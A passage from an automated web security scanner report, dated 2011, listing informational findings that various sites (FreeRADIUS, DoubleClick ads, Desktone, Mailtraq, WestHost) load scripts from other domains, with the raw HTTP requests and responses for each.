Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:54 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Set-Cookie: bb_lastactivity=0; expires=Sat, 15-Sep-2012 19:42:54 GMT; path=/; domain=.cpanel.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: vbseo_loggedin=deleted; expires=Thu, 16-Sep-2010 19:42:53 GMT; path=/
Content-Length: 99145
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</span><script type="text/javascript" src="//connect.facebook.net/en_US/all.js#appId=238200696226156&amp;xfbml=1"></script>
...[SNIP]...
</a>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.42. http://freeradius.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freeradius.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: freeradius.org
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:38 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Tue, 12 Jul 2011 19:09:47 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>FreeRADIUS: The world's most po
...[SNIP]...
<!--wrapper-footer-->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.43. http://gallery.pictopia.com/bostonherald/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gallery.pictopia.com
Path:   /bostonherald/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bostonherald/ HTTP/1.1
Host: gallery.pictopia.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:37:27 GMT
Server: Apache
Expires: Sat, 17 Sep 2011 01:38:29 GMT
Vary: Accept-Encoding,User-Agent
ETag: "666d816928337674383d246b252afe9c"
Cache-Control: max-age=60
Content-Length: 19911
Last-Modified: Sat, 17 Sep 2011 01:37:29 GMT
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from wc4-www.pictopia.com
Via: 1.1 wc4-www.pictopia.com:80 (squid/2.7.STABLE6)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://pictopia.com/" xml
...[SNIP]...
<![endif]--><script language="javascript" src="http://static-gallery.pictopia.com.edgesuite.net/providerasset/1/yui_base.js?r=100002266" type="text/javascript">//i</script><script language="javascript" src="http://static-gallery.pictopia.com.edgesuite.net/providerasset/1/ptp.js?r=100002266" type="text/javascript">//i</script><script language="javascript" src="http://static-gallery.pictopia.com.edgesuite.net/providerasset/1/gallery.js?r=100002266" type="text/javascript">//i</script><script language="javascript" src="http://static-gallery.pictopia.com.edgesuite.net/providerasset/1/generic.js?r=100002266" type="text/javascript">//i</script>
...[SNIP]...

18.44. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1316256721&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238721641&bpp=15&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504&correlator=1316238718686&frm=4&adk=1193615914&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&eid=36887101&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=240&xpc=XB0udw8jWy&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:50:39 GMT
Server: cafe
Cache-Control: private
Content-Length: 8503
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 25 10:42:47 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

18.45. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=250&slotname=7623399685&w=300&lmt=1316257290&flash=10.3.183&url=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F&dt=1316239290244&bpp=266&shv=r20110907&jsv=r20110914&correlator=1316239290962&frm=4&adk=221221083&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1927014896&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=0&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=904&xpc=z62hmeYFip&p=http%3A//www.bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: cafe
Cache-Control: private
Content-Length: 13166
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#b47b10}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.46. http://info.desktone.com/cloudhosted.virtual.desktop.free.trial.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.desktone.com
Path:   /cloudhosted.virtual.desktop.free.trial.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloudhosted.virtual.desktop.free.trial.html HTTP/1.1
Host: info.desktone.com
Proxy-Connection: keep-alive
Referer: http://www.desktone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=LKZYVMS172.25.101.96CKMLJ; _mkto_trk=id:070-XIP-593&token:_mch-desktone.com-1316237201401-57160; __utma=172106422.940396514.1316237254.1316237254.1316237254.1; __utmb=172106422.1.10.1316237254; __utmc=172106422; __utmz=172106422.1316237254.1.1.utmcsr=info.desktone.com|utmccn=(referral)|utmcmd=referral|utmcct=/gaw.hosted.virtual.desktop.free.trial.html

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:31:18 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 32115
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

                               <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=desktone"></script>
...[SNIP]...
</BODY> tag -->
<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...

18.47. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.desktone.com
Path:   /gaw.hosted.virtual.desktop.free.trial.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gaw.hosted.virtual.desktop.free.trial.html?_kk=VDI&_kt=31d1a2bd-f653-42ac-b143-8a094cde83dc&gclid=COryhqeCo6sCFTEaQgodYAJH4g HTTP/1.1
Host: info.desktone.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:25:17 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 31655
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<div id="footer" class="group">
<script type="text/javascript" src="http://munchkin.marketo.net/js/munchkin.js"></script>
...[SNIP]...
</script>

                               <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=desktone"></script>
...[SNIP]...
</BODY> tag -->
<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...

18.48. http://info.mailtraq.com/imap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.mailtraq.com
Path:   /imap

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imap HTTP/1.1
Host: info.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: 1583-query=; path=/; HttpOnly;
Set-Cookie: 1583%2Duserid=%2D3830349; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:42:31 GMT
Connection: close

<html><head><title>IMAP Server in the Mailtraq email server</title><meta name="description" content="Mailtraq's IMAP Server provides a complete IMAP implementation offering a powerful remote mail stor
...[SNIP]...
</script><SCRIPT src="http://www.google-analytics.com/urchin.js" type=text/javascript>
</SCRIPT>
...[SNIP]...

18.49. http://info.mailtraq.com/wac  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.mailtraq.com
Path:   /wac

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wac HTTP/1.1
Host: info.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://www.mailtraq.com/30day
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1583%2Dreferer=http%3A%2F%2Fduckduckgo%2Ecom%2F%3Fq%3Dimap%2Bserver; ASPSESSIONIDQQSDCQTS=EJBHPKFBKMPAIDFPJELDBDIJ; __utma=248930399.1287691746.1316220202.1316220202.1316220202.1; __utmb=248930399.1.10.1316220202; __utmc=248930399; __utmz=248930399.1316220202.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; 1583-query=; 1583%2Duserid=%2D3830349; __utma=224494342.1969248356.1316220641.1316220641.1316220641.1; __utmc=224494342; __utmz=224494342.1316220641.1.1.utmcsr=info.mailtraq.com|utmccn=(referral)|utmcmd=referral|utmcct=/imap; __utmb=224494342.1.10.1316220641

Response

HTTP/1.1 200
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: 1583-query=; path=/; HttpOnly;
Set-Cookie: 1583%2Duserid=%2D3830349; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:50:01 GMT
Connection: close

<html><head><title>Proxy Server in the Mailtraq email server</title><meta name="author" content="neatComponents" /><meta http-equiv="imagetoolbar" content="no" /><meta http-equiv="Content-Type" conten
...[SNIP]...
</script><SCRIPT src="http://www.google-analytics.com/urchin.js" type=text/javascript>
</SCRIPT>
...[SNIP]...

18.50. http://l.yimg.com/l/social_buttons/facebook-share-iframe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /l/social_buttons/facebook-share-iframe.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /l/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fomg.yahoo.com%2Fphotos%2Fwhat-were-they-thinking%2F5203&t=&l=Share HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:53 GMT
Cache-Control: max-age=300, public
Expires: Tue, 14 Sep 2021 00:52:53 GMT
Content-Type: text/html; charset=utf-8
Age: 133
Content-Length: 2259
Proxy-Connection: keep-alive
Server: YTS/1.19.5

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/3.1.1/build/cssreset/res
...[SNIP]...
</a>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

18.51. http://members.westhost.com/v2/AddFavorites.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/AddFavorites.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/AddFavorites.js HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:45 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.52. http://members.westhost.com/v2/images/Icon-Install.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/images/Icon-Install.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/images/Icon-Install.gif HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:47 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.53. http://members.westhost.com/v2/images/bgmembers.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/images/bgmembers.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/images/bgmembers.gif HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:46 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.54. http://members.westhost.com/v2/images/diagram_imap.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/images/diagram_imap.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/images/diagram_imap.gif HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:47 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.55. http://members.westhost.com/v2/images/diagram_pop3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/images/diagram_pop3.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/images/diagram_pop3.gif HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:47 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.56. http://members.westhost.com/v2/images/dotted_underline.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/images/dotted_underline.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/images/dotted_underline.gif HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:47 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.57. http://members.westhost.com/v2/images/hi_imap.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/images/hi_imap.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/images/hi_imap.gif HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:46 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.58. http://members.westhost.com/v2/images/larrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/images/larrow.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/images/larrow.gif HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:47 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.59. http://members.westhost.com/v2/images/printpage.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/images/printpage.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/images/printpage.gif HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:46 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
